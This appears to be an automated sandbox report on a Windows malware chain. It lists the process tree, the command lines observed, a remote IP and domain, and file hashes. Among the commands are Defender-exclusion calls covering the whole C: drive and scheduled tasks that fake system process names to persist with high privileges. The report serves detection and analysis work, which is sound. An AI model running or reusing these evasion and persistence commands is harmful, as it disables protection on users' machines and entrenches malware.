PID 3884 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\hwid.exe C:\Windows\SysWOW64\WScript.exe 3
PID 1988 wrote to memory of 4736 N/A C:\Users\Admin\AppData\Local\Temp\ZOROLOK.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 8
PID 2904 wrote to memory of 1704 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe 3
PID 1704 wrote to memory of 4016 N/A C:\Windows\SysWOW64\cmd.exe C:\comServerRefcrtNet\ComsurrogateHost.exe 2
PID 4016 wrote to memory of 3860 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 2
PID 4016 wrote to memory of 4252 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 2
PID 4016 wrote to memory of 540 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4016 wrote to memory of 540 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4016 wrote to memory of 1976 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4016 wrote to memory of 1976 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4016 wrote to memory of 2336 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4016 wrote to memory of 2336 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4016 wrote to memory of 3412 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4016 wrote to memory of 3412 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4016 wrote to memory of 2800 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4016 wrote to memory of 2800 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4016 wrote to memory of 3696 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4016 wrote to memory of 3696 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4016 wrote to memory of 4348 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4016 wrote to memory of 4348 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4016 wrote to memory of 3608 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4016 wrote to memory of 3608 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4016 wrote to memory of 4552 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4016 wrote to memory of 4552 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4016 wrote to memory of 4816 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4016 wrote to memory of 4816 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4016 wrote to memory of 2276 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 4016 wrote to memory of 2276 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 2276 wrote to memory of 2872 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 2276 wrote to memory of 2872 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 4016 wrote to memory of 4356 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\cmd.exe
PID 4016 wrote to memory of 4356 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\cmd.exe
PID 4356 wrote to memory of 1352 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\chcp.com
PID 4356 wrote to memory of 1352 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\chcp.com
PID 4356 wrote to memory of 4796 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 4356 wrote to memory of 4796 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 4356 wrote to memory of 2140 N/A C:\Windows\System32\cmd.exe C:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe
PID 4356 wrote to memory of 2140 N/A C:\Windows\System32\cmd.exe C:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe
PID 2140 wrote to memory of 712 N/A C:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2140 wrote to memory of 712 N/A C:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2140 wrote to memory of 320 N/A C:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2140 wrote to memory of 320 N/A C:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2140 wrote to memory of 3036 N/A C:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2140 wrote to memory of 3036 N/A C:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\QuwyWare.exe

"C:\Users\Admin\AppData\Local\Temp\QuwyWare.exe"

C:\Users\Admin\AppData\Local\Temp\hwid.exe

"C:\Users\Admin\AppData\Local\Temp\hwid.exe"

C:\Users\Admin\AppData\Local\Temp\ZOROLOK.exe

"C:\Users\Admin\AppData\Local\Temp\ZOROLOK.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\comServerRefcrtNet\mqTOHq8aHZClYn48E.vbe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\comServerRefcrtNet\lnxvZRavX52Sj8TeqZsoOZAX1b085ZLmiJmz2YXZ5HGWoFSPgyZVlmrEm.bat" "

C:\comServerRefcrtNet\ComsurrogateHost.exe

"C:\comServerRefcrtNet/ComsurrogateHost.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/comServerRefcrtNet/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\SearchApp.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\SearchApp.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\SearchApp.exe'" /rl HIGHEST /f

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nr14kmka\nr14kmka.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9470.tmp" "c:\Windows\System32\CSC284368D78044F41BA30132654ADC74A.TMP"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\cmd.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\cmd.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\cmd.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 12 /tr "'C:\comServerRefcrtNet\unsecapp.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\comServerRefcrtNet\unsecapp.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 12 /tr "'C:\comServerRefcrtNet\unsecapp.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 8 /tr "'C:\Program Files\MSBuild\powershell.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "powershell" /sc ONLOGON /tr "'C:\Program Files\MSBuild\powershell.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 10 /tr "'C:\Program Files\MSBuild\powershell.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 7 /tr "'C:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 5 /tr "'C:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe'" /rl HIGHEST /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\yRstqPcxW7.bat"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe

"C:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/comServerRefcrtNet/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\8JExSyzmRo.bat"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe

"C:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/comServerRefcrtNet/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 5 /tr "'C:\comServerRefcrtNet\TextInputHost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "TextInputHost" /sc ONLOGON /tr "'C:\comServerRefcrtNet\TextInputHost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 5 /tr "'C:\comServerRefcrtNet\TextInputHost.exe'" /rl HIGHEST /f

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\siuck4sj\siuck4sj.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE05.tmp" "c:\Recovery\WindowsRE\CSCA07083C9CF314723A6CD4948A81461.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xfvq1vqc\xfvq1vqc.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFBA.tmp" "c:\Recovery\WindowsRE\CSC671A800D3B124051996CE8178E9AE197.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\u1elvbdo\u1elvbdo.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES11AE.tmp" "c:\comServerRefcrtNet\CSC40A8B3E794A14CB6B81AC9695A086B0.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ywdpcwvf\ywdpcwvf.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES126A.tmp" "c:\Program Files\MSBuild\CSCA9C160C1AA0842E0AAA271B7FBC3FCF.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\uwf5e2pn\uwf5e2pn.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1354.tmp" "c:\Windows\SoftwareDistribution\Download\CSC843AFAE444044DF9A627B2B89B543F.TMP"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smsss" /sc MINUTE /mo 12 /tr "'C:\Program Files\Windows Media Player\ja-JP\smss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Program Files\Windows Media Player\ja-JP\smss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smsss" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Media Player\ja-JP\smss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 11 /tr "'C:\comServerRefcrtNet\powershell.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "powershell" /sc ONLOGON /tr "'C:\comServerRefcrtNet\powershell.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 13 /tr "'C:\comServerRefcrtNet\powershell.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Google\CrashReports\WmiPrvSE.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Program Files (x86)\Google\CrashReports\WmiPrvSE.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Google\CrashReports\WmiPrvSE.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorere" /sc MINUTE /mo 9 /tr "'C:\Windows\Resources\Themes\aero\Shell\NormalColor\explorer.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Windows\Resources\Themes\aero\Shell\NormalColor\explorer.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorere" /sc MINUTE /mo 12 /tr "'C:\Windows\Resources\Themes\aero\Shell\NormalColor\explorer.exe'" /rl HIGHEST /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\sbaEnqO3wz.bat"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\comServerRefcrtNet\powershell.exe

"C:\comServerRefcrtNet\powershell.exe"

C:\comServerRefcrtNet\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'

C:\comServerRefcrtNet\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'

C:\comServerRefcrtNet\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/comServerRefcrtNet/'

C:\comServerRefcrtNet\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'

C:\comServerRefcrtNet\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'

C:\comServerRefcrtNet\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'

C:\comServerRefcrtNet\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'

C:\comServerRefcrtNet\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'

C:\comServerRefcrtNet\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'

C:\comServerRefcrtNet\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'

C:\comServerRefcrtNet\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'

C:\comServerRefcrtNet\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'

Network

Country Destination Domain Proto
PL 77.73.129.75:1912 tcp
US 8.8.8.8:53 cx38856.tw1.ru udp
PL 77.73.129.75:1912 tcp
US 8.8.8.8:53 cx38856.tw1.ru udp
PL 77.73.129.75:1912 tcp

Files

C:\Users\Admin\AppData\Local\Temp\hwid.exe

MD5 816e9b3d8faf4363950a3d9129827a11
SHA1 7da1893debf23ed95d8e7ca8c1c50cd7fdba7c4e
SHA256 21859a1ca0ee915f6da48d6377c75854abe0aec5710621db0179390795f478e0
SHA512 dbe55c87fb5a78b1a0af228d9c32e7b81349c058fbe8bef07b4a9efdeee6d1fbf3c713809996398cb51a48ea9811dc4ad326c9da0dfcd93f7cb084346ec95f3b

C:\Users\Admin\AppData\Local\Temp\ZOROLOK.exe

MD5 b045a059a8ea1e07b8683c4dcad8bf33
SHA1 2e0c49010ae8b71c4a89667ef4acc7ecb92f8d13
SHA256 7e9ac472cbfb7e7955ea76ceb80d1a350158a83f043796e31b2050307cbba7d2
SHA512 b4716cb4bac88720f1ead0ccfe91e5f6aee481d2bc19335750a34689cda3c57c805bf4eaadb6c739e5faceee9e3f57e93f081c46993782580688b6b9ccc6ba1f

memory/512-17-0x0000000000400000-0x0000000001400000-memory.dmp

memory/1988-27-0x00000000008E0000-0x0000000000A76000-memory.dmp

C:\comServerRefcrtNet\mqTOHq8aHZClYn48E.vbe

MD5 e9b30ad4a605da5d269fcf68e8460dee
SHA1 379b8c9c8e09497a763d346e0c9962e7d12f1b24
SHA256 aad887b3e8d352a4157320bab3a082e25bbd651443cb85c43fd5a368246e5c41
SHA512 6f0e22fc3146b0a2c306a2e67d5984c396cd30c845ecd86db52a2705f68545cfc57f0ad6735b0280487239251c7eeccda2ceec24bd88815746fe74b17ad8773e

C:\Users\Admin\AppData\Roaming\d3d9.dll

MD5 73bd889f94de4bfc1d8262c57aa53c8f
SHA1 ead79448f3a883c587ae1f2e26d2f71b18a38b50
SHA256 dc9c1747e3f6bcc2eaccdca84ab8f76881dfc04cf0c06fc00f1c02ec2c1f0609
SHA512 05dab2f0b978aa34d3fa59bf89c0061622a0fc99c4f00570cbc42dbe371edbd3444cda7cde4ccff521b36a4dea74464759571ea35e21312da538ae19564f11d5

memory/4736-35-0x0000000000400000-0x0000000000452000-memory.dmp

memory/4736-37-0x0000000005860000-0x0000000005E04000-memory.dmp

memory/4736-38-0x00000000051D0000-0x0000000005262000-memory.dmp

memory/4736-39-0x0000000005280000-0x000000000528A000-memory.dmp

memory/4736-40-0x0000000006430000-0x0000000006A48000-memory.dmp

memory/4736-41-0x00000000055C0000-0x00000000056CA000-memory.dmp

memory/4736-42-0x0000000005450000-0x0000000005462000-memory.dmp

memory/4736-43-0x00000000054F0000-0x000000000552C000-memory.dmp

memory/4736-44-0x0000000005530000-0x000000000557C000-memory.dmp

C:\comServerRefcrtNet\lnxvZRavX52Sj8TeqZsoOZAX1b085ZLmiJmz2YXZ5HGWoFSPgyZVlmrEm.bat

MD5 3fae6518481781ecb7456ab4febba3bf
SHA1 28aefef1012344b0226e2a3f21f9bf1bd89c3acf
SHA256 db0ac9dd933a8546f18f86d8985ac579b6f50ac5242b7980b99512a7429375ff
SHA512 781678b5c9bdeaf273cb4ca7343b5e0725cea5020ce2cf8e4eb85da18e0e87ebb6a96a7d059a320731f06265cad8485ccc372820d8474706ed532f794a053e24

C:\comServerRefcrtNet\ComsurrogateHost.exe

MD5 0f955b3f70b28d7303d8ac1327639d24
SHA1 98005ccb926070a45d58dc905cf73d8de6943953
SHA256 3dad4c00a25d6d16be232f43deb4ba480731fac732db4443932545894911a1a8
SHA512 a5f9567f911c3b76f15a9e400cdb73caca6f2fb819039480bb0af2ec9a1b6861a44d935fa08fa76da9cab0810bdb96a1a4b345f87d72b96a2840d44d4aba9706

memory/4016-49-0x00000000000F0000-0x00000000002AE000-memory.dmp

memory/4016-51-0x0000000002310000-0x000000000231E000-memory.dmp

memory/4016-53-0x0000000002340000-0x000000000235C000-memory.dmp

memory/4016-54-0x00000000023F0000-0x0000000002440000-memory.dmp

memory/4016-56-0x0000000002370000-0x0000000002388000-memory.dmp

memory/4016-58-0x0000000002320000-0x000000000232E000-memory.dmp

memory/4016-60-0x0000000002330000-0x000000000233C000-memory.dmp

memory/4016-62-0x00000000023E0000-0x00000000023F0000-memory.dmp

memory/4016-64-0x000000001AEC0000-0x000000001AF1A000-memory.dmp

memory/4016-66-0x0000000002440000-0x000000000244E000-memory.dmp

memory/4016-68-0x000000001AE60000-0x000000001AE78000-memory.dmp

memory/4016-70-0x0000000002450000-0x000000000245C000-memory.dmp

memory/4016-72-0x000000001B070000-0x000000001B0BE000-memory.dmp

memory/2336-88-0x0000021B6CEA0000-0x0000021B6CEC2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kjgf2uu4.pra.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

\??\c:\Users\Admin\AppData\Local\Temp\nr14kmka\nr14kmka.cmdline

MD5 b1f02cbb5cefa2e608d46b1597bfde7c
SHA1 a38881618ee652cd10025217b010b102cceaf827
SHA256 28265a6d8f790617e201fb7d2afb39cfee69dc44945d1f30dbe066d86385a281
